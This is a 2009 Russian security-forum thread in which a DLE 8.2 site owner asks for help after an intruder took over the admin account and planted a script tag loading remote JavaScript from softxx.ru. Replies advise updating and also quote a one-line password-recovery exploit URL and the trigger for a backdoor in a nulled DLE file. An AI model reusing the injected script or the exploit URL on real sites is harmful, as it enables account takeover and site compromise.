Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

10.12.2009, 00:17
|
|
Новичок
Регистрация: 07.12.2009
Сообщений: 3
Провел на форуме: 19689
Репутация:
0
|
|
Нужна помощь ломают сайт
В общем проблемка такая. Недавно захожу на свой сайт и на своё удивление вижу что от куда то появилась рекламма кликандера. Попытался воити под админским аккаунтом, но так и не смог кто то сменил пароль, вобщем я воспользовался восстановлением пароля на e-mail зашёл в админку и нашёл в шаблоне такой код:
Код:
<script language='javascript' type='text/javascript' src='http://softxx.ru/m'></script>
посмотрел с какого IP последний раз заходили в админку 81.222.236.109
Информация об ip-адресе 81.222.236.109
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '81.222.236.0 - 81.222.236.255'
inetnum: 81.222.236.0 - 81.222.236.255
netname: TimeWeb
descr: Hosting Service Provider
country: RU
admin-c: AAB74-RIPE
tech-c: AAB74-RIPE
status: ASSIGNED PA
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered
person: Alexandr A Boykov
address: 13, Sedova st.
address: 192148, Saint-Petersburg
address: Russia
phone: +7 812 3341520
fax-no: +7 812 3341530
abuse-mailbox: abuse@timeweb.ru
nic-hdl: AAB74-RIPE
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered
% Information related to '81.222.192.0/18AS20597'
route: 81.222.192.0/18
descr: ELTEL.net
origin: AS20597
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered
Как я понял что кто то c VDS на TimeWebe ломает
Пробовал переименовать файл admin.php, но к сожалению не помогло сейчас снова ломанули
хочу сейчас права на запись main.tpl убрать незнаю поможет или нет
Подскажите что можно поделать сайт стоит на DLE
|
|
|

10.12.2009, 00:19
|
|
[bald man]
Регистрация: 13.07.2009
Сообщений: 623
Провел на форуме: 4490909
Репутация:
1167
|
|
обновить версию дле
|
|
|

10.12.2009, 00:22
|
|
Участник форума
Регистрация: 03.07.2009
Сообщений: 151
Провел на форуме: 638378
Репутация:
41
|
|
Попробуй DLE обновить и попроси кого-нибудь из прошареных знакомых сайт на уязвимости проверить, может найдете дырку, через которую зараза лезет.
|
|
|

10.12.2009, 00:24
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме: 4075418
Репутация:
386
|
|
смотри логи, мож найдеш чего интересного 
|
|
|

10.12.2009, 00:28
|
|
Новичок
Регистрация: 07.12.2009
Сообщений: 3
Провел на форуме: 19689
Репутация:
0
|
|
версия DLE 8.2
дело в том что у меня есть ещё пару сайтов на dle они на более старых версиях, но там всё нормально никто не ломает
кстати сейчас погуглил нашёл http://devilstar.habrahabr.ru/blog/76359/ видимо не только у меня такая проблемка
|
|
|

11.12.2009, 05:48
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме: 3629857
Репутация:
504
|
|
http://drtro.name/249-dle-8-2-nedostatochnye-filtraciya-v-praktike/
обнови свой дле
|
|
|

30.12.2009, 05:19
|
|
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме: 70191
Репутация:
0
|
|
Точно такая проблема была сайт ломали по 3-4 раза на день! Поставил 8.3 всё нормально!
Последний раз редактировалось sir95; 30.12.2009 в 14:47..
|
|
|

30.12.2009, 05:42
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме: 1957988
Репутация:
739
|
|
http://forum.antichat.ru/showpost.php?p=1683160&postcount=83
Найдена уязвимость в DLE 8.2(Только в этой версии)
/index.php?do=lostpassword&douser=1&lostid=
Получаем пас от пользователя с id 1
хм
|
|
|

31.12.2009, 02:11
|
|
Участник форума
Регистрация: 25.03.2006
Сообщений: 125
Провел на форуме: 346335
Репутация:
16
|
|
средствами сервера поставь пароль на папку с админкой, с самим файлом .htaccess гемороится не советую, если есть директ админ - там это сделать очень просто.
|
|
|

03.01.2010, 04:36
|
|
Познающий
Регистрация: 19.06.2009
Сообщений: 62
Провел на форуме: 326503
Репутация:
-5
|
|
В DLE 8.2 в одном из компонентов движка шелл.
Настоятельно рекомендую проверить файлик, лежащий по адресу - engine/ajax/updates.php
Ищем там такую шнягу - if($_GET['wert']=='')
Измени/обнови файл.
В следующий раз качай нуллы из достоверных источников.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|